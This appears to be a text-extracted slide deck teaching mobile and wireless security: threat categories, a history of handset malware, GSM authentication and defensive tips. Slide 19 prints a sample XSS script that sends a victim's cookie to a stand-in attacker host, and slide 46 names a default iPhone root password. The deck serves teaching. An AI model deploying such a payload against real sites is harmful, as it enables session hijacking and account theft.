The document discusses various security threats and vulnerabilities related to mobile devices and wireless networks. It covers topics like mobile malware, attacks on authentication, services and protocols, and security issues with browsers, operating systems, software applications and network channels. Specific threats mentioned include cross-site scripting, injection flaws, buffer overflows, Trojan horses, denial-of-service attacks, and weaknesses in GSM network security. The document emphasizes that mobile device capabilities now far exceed security and that stolen or lost devices can reveal private user information.

1. Security and Communication

2. Security Concept Security is the process of preventing and detecting unauthorized use Prevention measures help you to stop unauthorised users (intruders) from accessing Detection helps you to determine whether or not someone attempted to break into

3. There is no system that is absolutely secure , any form of security can be broken In order to have a secure system, it is useful to understand The mobile vulnerabilities – the loopholes / weaknesses of our mobile or network The security threats – attacks against computer vulnerabilities

4. Current threats by mobile malware For financial gain / loss Unnecessary calls / SMS / MMS Send and sell private information Cause phones to work slowly or crash Wipe out contact books and other information on the phone Remote control of the phone Install “false” applications

5. Several types of attacks relevant to small devices Attacks on authentication Attacks on services Attacks on protocols

6. Attacks on authentication : Often called a dictionary attack or password attack , these assaults make repeated attempts to break through authentication barriers by guessing the identification or private information, interpreting the responses, and trying again with a new guess.

7. Attacks on services : these types of attacks target known bugs in the implementations of services . The idea is to either crash the service or to put the implementation into some kind of error mode that gives access to other system functions. This is usually done by accessing “boundary conditions”; overloading internal buffers or using untested commands. On a small device, a crash can be lethal, bringing the device down to an inoperable state and potentially losing valuable data

8. Attacks on protocols: Again, these attacks focus on bugs in protocol implementations . The idea here is to force the device into a state that will accept any command or simply freeze the machine.

9. Threats and vulnerabilities in wireless networks and handheld devices All the vulnerabilities that exist in a conventional wired network apply to wireless technologies . Malicious entities may gain unauthorized access to an organization’s computer network through wireless connection, by passing any firewall protections . Sensitive information that is not encrypted and that is transmitted between two wireless devices may be intercepted and disclosed. Denial of service attacks may be directed at wireless connection or devices. Sensitive data may be corrupted during improper synchronization . Malicious entities may be able to violate the privacy of legitimate users and be able to track their movements . Handheld devices are easily stolen and can reveal sensitive information. Data may be extracted without detection from improperly configured devices .

10. More than 80% of enterprise's digitized information reside in individual hard drives and in personal files and 80% of the data is unstructured, not secure nor backed up. Individuals hold the key to the knowledge economy and most of it is lost when they leave the enterprise Employees get 50%-75% of their relevant information directly from other people Today’s Information Challenge Source: Gartner Group/CIBC World Markets

11. Trust C o nfidence to transact Security principles C onfidentiality Ensure privacy of user information and transmission I ntegrity Ensure accuracy of data and data processing A vailability Maximize functionality and uptime

12. To protect your system against those attacks, information security is also focused on these three areas: Confidentiality – ensuring that only appropriate access is allowed to data. Confidentiality is accomplished by some form of cryptographic technique. With that, only the intended recipient of a message can make sense of it. Integrity – ensuring changes on information are made only by authorised people. Availability – ensuring that required data is accessible.

13. Internet Security Vulnerabilities The term vulnerability is applied to weakness in a system which allows an attacker to violate the integrity of that system. Vulnerabilities may result from software bugs, settings on operating system, weak password, computer virus, and etc.

14. Browsers Browsers provide an environment to run scripts . Un-patched or older versions of Internet Explorer contain multiple vulnerabilities that can lead to memory corruption, spoofing and execution of arbitrary scripts (run by chance randomly and informally, not by necessity or principle) or code. Remote code can be executed without any user interaction when a user visits a malicious web page or reads a malicious/harmful email. With the explosion of rich content in web sites, the use of browser Helper Object and third-party plug-ins has increased to access various MIME file types such as multimedia and documents. Plug-ins that support client-side scripting (such as Flash and Shockwave) enable access to third party file formats. Many of the plug-ins are installed (semi-)transparently by a website without users’ awareness. The additional plug-ins introduce more avenues for hackers to exploit to compromise computers of users visiting malicious web sites.

15. Operating Systems The operating system is the foundation on which online applications are built. Weaknesses in the operating system can be used to compromise security in the server regardless of security settings of applications. Key vulnerabilities in an OS include: Insecure default settings – basic configuration and account settings Web server flaws – HTTP GET method and other bugs CGI script flaws – mishandling of malicious input Denial of Service – can’t respond to too many request Weak Authentication – using default password, weak password or no password Software holes – buffer overruns, registry.

16. Server settings Ecommerce servers typically include front-end web servers and connections to back-end database Software flows in any of the ecommerce servers represent a serious security vulnerability in the system The error messages display by MS SQL Server allows attackers to find out information on the database. Data stored on the server is usually not encrypted . Many servers are keeping large number of ports open Not having backup or incomplete backup would disable the recovering from attack. No filtering of packets results in no verification on the legitimacy of packets addresses coming in and out of your network. Not keeping regular network logs impairs the ability to analyse network traffics especially to tell if an attack such as DOS is launched.

17. Software / Web Applications Bugs Software flows in any of the ecommerce servers represent a serious security vulnerability in the system The programmer may leaves an exploitable bug in a software which allows attacker to misuse an application, for example, bypassing access control checks or executing commands on the system hosting the application. Failure to check the size of data buffers , which can then be overflowed , causing corruption of the stack or heap areas of memory including causing the computer to execute code provided by the attacker. The error messages provided by the programmer based upon different inputs supply useful information for attackers. The common attack occurs in the login function.

18. Network Channels Internet is an insecure channel for sending messages. Transmission over the Internet can be interrupted easily by people with bad intention. Communication devices such as router, gateway or switch are common attacking targets

19. Threats / Attacks Cross-side Scripting (XSS) XSS flaws occur whenever an application takes data that originated from a user and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser, which can hijack user session, deface web sites, insert hostile content, conduct phishing attacks (commit fraud to get financial info), and take over the user’s browser using scripting malware. The popular malicious scripts are JavaScript, VBScript ActiveX and Flash. <script>document.location= 'http://attackherhost.example/cgi-bin/cookiesteal.cgi? '+document.cookie</script> The following are samples of XXS: The script sends the user’s cookie to attacker’s host.

20. Injection Flaws There are many types of injections: SQL, LDAP, XPath, XSLT, HTML, XML, OS command and etc. XXS is part of inject flaws. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. Attackers trick the interpreter into executing unintended commands via supplying specially crafted data.

21. Inject flaws allow attackers to create, read, update or delete any data available to the application. The worst scenario, these flaws allow an attackers to completely compromise the application and underlying system, even bypassing deeply nested firewalled environment.

22. Buffer overflow Buffer overflow or buffer overrun refers to condition where a process attempts to store data beyond the boundaries of a fixed-length buffer. The result is that the extra data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow data, and may result in erratic program behaviour, memory access exception, program termination, incorrect results or breaching of system security.

23. Malicious File Execution Malicious file execution vulnerabilities are found in many applications This allows attackers to perform: Remote code execution Remote root kit installation and complete system compromise On Windows, internal system compromise may be possible through the use of PHP’s SMB file wrappers

24. Trojan horse programs Trojan horse programs are a common way for intruders to trick you (sometimes referred to as &quot;social engineering&quot;) into installing &quot;back door&quot; programs. These can allow intruders easy access to your computer without your knowledge, change your system configurations, or infect your computer with a computer virus. E.g: BackOrifice, Netbus, and SubSeven.

25. Email spoofing when an email message appears to have originated from one source when it actually was sent from another source is often an attempt to trick the user into making a damaging statement or releasing sensitive information (such as passwords)

26. Denial-of-Service (DoS) is an attack that causes your computer to crash or to become so busy processing data that you are unable to use it.

27. Unprotected Windows shares can be exploited by intruders in an automated way to place tools on large numbers of Windows-based computers attached to the Internet. Because site security on the Internet is interdependent, a compromised computer not only creates problems for the computer's owner, but it is also a threat to other sites on the Internet.

28. Chat clients provide a mechanism for information to be transmitted bi-directionally between computers on the Internet provide groups of individuals with the means to exchange dialog, web URLs, and in many cases, files of any type many chat clients allow for the exchange of executable code, they present risks similar to those of email clients

29. Packet sniffing Is a program that captures data from information packets as they travel over the network That data may include user names, passwords, and proprietary information that travel over the network in clear text

30. Dictionary or Brute Force Attack Programs that are used to defeat a cryptographic by trying to determine its decryption Tries every possible code, combination until it finds the right one. It requires a long time to get to the correct guest but eventually it will reach the answer. The common one is to crack the passwords used by the users

31. Handset Security Issues (1) People store a wealth of information on their handsets and don’t think about securing them! Incoming, outgoing, missed calls SMS (text) and MMS messages E-mail Instant-messaging (IM) logs Multimedia, e.g. , pictures, music, videos Personal calendars Address books Clearly, handset security is a vitally important challenge

32. Handset Malware History (1) Hackers are already attacking handsets Most well-known case: a 17-year-old broke into Paris Hilton’s Sidekick handset Less well-known: worms, viruses, and Trojans have targeted handsets since 2004 2004: Cabir worm released by “29A,” targets Symbian phones via Bluetooth Duts virus, released by same group, targets Windows Mobile phones Brador Trojan released by same group, opens backdoor on Windows Mobile

33. Case Study – CABIR First mobile worm Only as Proof-Of-Concept Spread vector – Bluetooth Infected file – caribe.sis 15 new variants exist

34. Case Study - ComWar Second landmark in mobile worms Spread vector - Bluetooth and MMS Large spread area due to MMS Not as proof of concept – Intention to harm by charging the mobile user Multiple variants detected

35. Case Study - CardTrap First cross-over mobile virus found Can migrate from mobile to PC Propogates as infected mobile application as well as Windows worm 2 variants found – Both install with legitimate applications – Black Symbian and Camcorder Pro

36. Handset Malware History (2) 2005: CommWarrior worm released; replicates via Bluetooth, MMS messages to all contacts in address book Doomboot Trojan released; claims to be “Doom 2” video game, installs Cabir and CommWarrior 2006: RedBrowser Trojan released; claims to be a Java program, secretly sends premium-rate SMS messages to a Russian phone number FlexiSpy spyware released; sends log of phone calls, copies of SMS/MMS messages to Internet server for third party to view 2008: First iPhone Trojan released Of course, other mobile malware has been released; some malware completely disables the handset There is also the possibility of mobile botnets

37. Android.Pjapps – Risk Level 1: Very Low Android.Pjapps is a Trojan horse that has been embedded on third party applications and opens a back door on the compromised device . It retrieves commands from a remote command and control server. Discovered: February 22, 2011

38. The images below show the installation process of a clean Steam Window application and a malicious one

40. When the Trojan is executed, it requests permissions to perform the following actions: Open network sockets Send and monitor incoming SMS messages Read and write to the user's browsing history and bookmarks Install packages Write to external storage Read the phone's state (i.e. out of service, radio off, etc)

41. Android.Pjapps - Removal Discovered: February 22, 2011 Updated: February 23, 2011 3:45:36 AM Type: Trojan Open the Google Android Menu. Go to the Settings icon and select Applications. Next, click Manage. Select the application and click the Uninstall button.

42. Key Handset Security Problems “ At this point, mobile device capability is far ahead of security .” – Prof. Patrick Traynor, Georgia Tech (emphasis added) Handset information can be stolen Transient information: Enhanced 911 can provide user location information Static information: “BlueSnarfing” attacks (connection without owner’s knowledge), cracking Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) Theft of service attacks, e.g. , premium-rate calls/SMS messages Denial-of-service attacks Flooding attacks overload the handset radio with garbage Power-draining attacks attempt to drain the battery Botnets and DoS attacks against networks are likely in the future Cybercriminals make 10× as much as security researchers!

43. Jailbroken iPhones and Upgrades When a jail broken iPhones gets an OS upgrade, the jailbreak gets reversed and would typically need to be redone. This may cause some users of jail broken iPhones to be reluctant to apply upgrades (even upgrades with critical security patches!), until the newly released version of iOS also gets jailbroken. That’s obviously a security issue and cause for concern.

44. Greenpois0n for iOS 4.2.1

45. But Beware Fake Jailbreaking Apps

46. And When You Do Get Successfully Jailbroken If you do successfully jailbreak your iPhone (with an app that’s not malicious in and of itself!), your exposure to OTHER malware will increase. Some of the malware which has targeted jailbroken iPhones has targeted unchanged OpenSSh passwords for the root and/or mobile accounts (which defaulted to “alpine”) : -- the “ikee” worm (aka “RickRolling” worm) -- the “Duh” worm (which changed “alpine” to “ohshit”, scanned for other vulnerable iPhones, and stole data) -- the &quot;iPhone/Privacy.A” (stole data/opened a backdoor)

47. The “ikee” Worm

48. The “Duh” Worm

49. Mobile Malware May Exploit Vulnerable Apps For example, just as Adobe Reader has been a popular target for malware on traditional desktop and laptop computers, Adobe Reader is also a popular attack vector on handheld mobile devices.

50. PDF Vulnerabilities on the iPhone mygadgetnews.com/2010/10/03/pdf-vulnerability-being-used-for-malicious-purposes-on-iphone-ios/

51. App Vetting and Third Party App Sources While regular iPhones usually get apps from the iTune Apps Store, jail broken phones can get apps from 3rd party repositories such as Cydia. It is unclear how much vetting new apps get before being listed at Cydia. The problem of rogue applications is not unique to just the iPhone…

52. A Sample Malicious Android Application

53. Threats to Network Operator GSM not immune to interception It is possible for the network to order the MS to switch on and off encryption at times of high loading This signal can be spoofed using a man-in-the-middle attack

54. GSM Security Operation GSM networks utilize encryption for three purposes: Authentication Encryption Key generation

55. GSM Security Operation (Cont..) GSM provides authentication of users and encryption of the traffic across the air interface. This is accomplished by giving the user and network a shared secret, called Ki. This 128-bit number is stored on the SIM-card, and is not directly accessible to the user. Each time the mobile connects to the network, the network authenticates the user by sending a random number (challenge) to the mobile. The SIM then uses an authentication algorithm to compute an authentication token SRES using the random number and Ki.

56. GSM Security Operation (Cont..) The mobile sends the SRES back to the network which compares the value with an independently computed SRES. At the same time, an encryption key Kc is computed. This key is used for encryption of subsequent traffic across the air interface. Thus, even if an attacker listening to the air traffic could crack the encryption key Kc, the attack would be of little value, since this key changes each time the authentication procedure is performed

57. Mitigation Strategies Handset manufacturers, OS & software vendors, and researchers have worked to counter threats Symbian OS requires apps to be cryptographically signed in order for them to run without user approval Some handset manufacturers have joined the Trusted Computing Group (TCG) and added hardware to thwart malware tampering with the device The iPhone runs each application in a “sandbox” to prevent malware from running on the device Heterogeneous handset OSes make massive malware outbreaks difficult Vendors like McAfee, Symantec, and Trend Micro sell security software for handsets; F-Secure has bundled its software with Hong Kong provider CSL’s handsets Researchers have worked on modeling malware propagation on networks, detecting power-draining attacks, etc.

58. Methods/Techniques to Secure your Data / System Protection from injection flaws Use appropriate input validation Use strongly typed parameterized query APIs Enforce least privilege Avoid detailed error messages Do not use simple escaping functions Disable scripting features in browser and email programs

59. Use virus protection software Don't open unknown email attachments or run programs of unknown origin Use good password and change password frequently Turn off unnecessary services and ports running on server Use firewall

60. Use Virtual Private Network (VPN) Use encryption Turn off your computer or disconnect from the network when not in use Keep all applications, including your operating system, patched

61. Make regular backups of critical data Make a boot disk in case your computer is damaged or compromised Have a security policy

62. 8 Steps to Secure Your Computer Required Safely Install Your Computer’s Operating System Keep Your Operating System Up To Date Install and Update Anti-Virus Software Use Strong Passwords Strongly Recommended Enable Firewall Protection Install and Use Spyware Removal Tools Back Up Important Files Enable Screen Saver Passwords

63. What is Defense in Depth A &quot;Defense in Depth&quot; Strategy employs multiple layers of protection between the control system and the outside world (potential attackers).

64. Defense in Depth Using a layered approach: Increases an attacker’s risk of detection Reduces an attacker’s chance of success Policies, Procedures, & Awareness OS hardening, update management, authentication Firewalls, VPN quarantine Guards, locks, tracking devices, HSM Network segments, IPSec, NIDS Application hardening, antivirus ACL, encryption User education against social engineering Physical Security Perimeter Internal Network Host Application Data

65. The Identity Lifecycle New User User ID Creation Credential Issuance Access Rights Account Changes Promotions Transfers New Privileges Attribute Changes Password Mgmt Strong Passwords “ Lost” Password Password Reset Retire User Delete/Freeze Accounts Delete/Freeze Entitlements

66. Architecture

67. Security Risk Analysis A simplified approach, taking into account your assets exposure to security risks Requires: Identifying your assets Assesing risks and their impact, probability and exposure Formulating plans to reduce overall risk exposure

68. Threat Modeling Structured analysis aimed at: Finding infrastructure vulnerabilities Evaluating security threats Identify countermeasures Originated from software development security threat analysis 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the System 4. Identify the Threats 5. Document the Threats 6. Rate the Threats

69. Email Safety Tips Do not open unexpected attachments. Use Spam Filters Beware of Spoof Emails or Phishing . Don’t send sensitive data in email. Avoid clicking on links in the body of an email message. While these links may not be a phishing attempt, they may not go to the site you intend. Unless you are completely comfortable that the email is legitimate, it is best to copy and paste the link or type it in directly in your browser.

70. Managing Spam Email Spam is often more of an annoyance than a security risk. However many email viruses are sent as spam and can be caught by spam filters.

71. Spoof Email (Phishing) 6 Ways to Recognize Phishing Generic Greeting For example, “Dear Customer”. Sense of urgency. May include an urgent warning requiring immediate action. Account status threat. May include a warning that your account will be terminated unless you reply. Forged email address. The sender’s email address may be forged, even if it looks legitimate. Forged links to Web sites. There is often a link to a Website to “fix” the problem. These are usually forged. Requests for personal information . Asking for login and password info, either in email or via the link. Phishing emails are an attempt by thieves to lure you into divulging personal and financial information, for their profit. They pretend to be from well-known legitimate businesses, and increasingly look as if they actually are. They use clever techniques to induce a sense of urgency on your part so that you don't stop to think about whether they are legitimate or not. You can learn to know what to look for and where to report these scams when you find them.

72. Don’t Send Sensitive Data in Email The Risks of Sending Sensitive Data in Email Sending email is insecure. You are storing sensitive data on your computer. You no longer control the sensitive data. The sensitive data may be sent to others without your knowledge. Alternatives to Sending Sensitive Data in Email Faculty, Staff, and Grad Students can use their WebFiles account. You can then share the information by using permissions or tickets. Although it's convenient to send colleagues sensitive data in email, it is unsafe. Not only is email an insecure way of sending information, you've lost control over that information once you hit the send button.

73. Mobile security tips Here’s what you can do to protect yourself now: Be alert. Don’t leave your handheld laying out on a café table or in an outside pocket of your purse or backpack. Don’t carry it in a jacket or any other place where a pickpocket could easily snatch it.

74. Password-protect your handhelds. Use strong password and PINs to make it difficult for thieves to access them. Consider using a third-party “padlock” program to give yourself extra protection.

75. Make backups. Just as you would for your PC or Mac, set up a regular backup schedule for the information on your mobile devices. Limit the amount of confidential data you carry on your handhelds. Use memory sticks or another removable medium to store sensitive information. Encrypt your most important files. A number of third-party software programs give you the ability to encrypt handheld data.

76. Protect your handhelds with security software. Norton Smartphone Security protects your smart phone from viruses and intruders. Use secure wireless connections. If you can’t find one, save important transmissions until you can connect to a secure environment.

77. Disable Bluetooth and wireless signals when they’re not in use. Use the same savvy surfing habits you do when connected over a land line. That means verifying the authenticity of email attachments, downloads, and Web sites.

78. Kaspersky Mobile Security Locate a lost or stolen smartphone Secure contacts, photos and files from unauthorized access Privacy Protection - for your eyes only Block unwanted calls or SMSs Parental control Protect your smart phone from malware and network attacks More info : http:// www.kaspersky.com/kaspersky_mobile_security

79. Security risk assessment The following table lists the areas that are included in the security risk assessment Infrastructure Applications Operations People

80. Infrastructure

81. Applications

82. Operations

83. People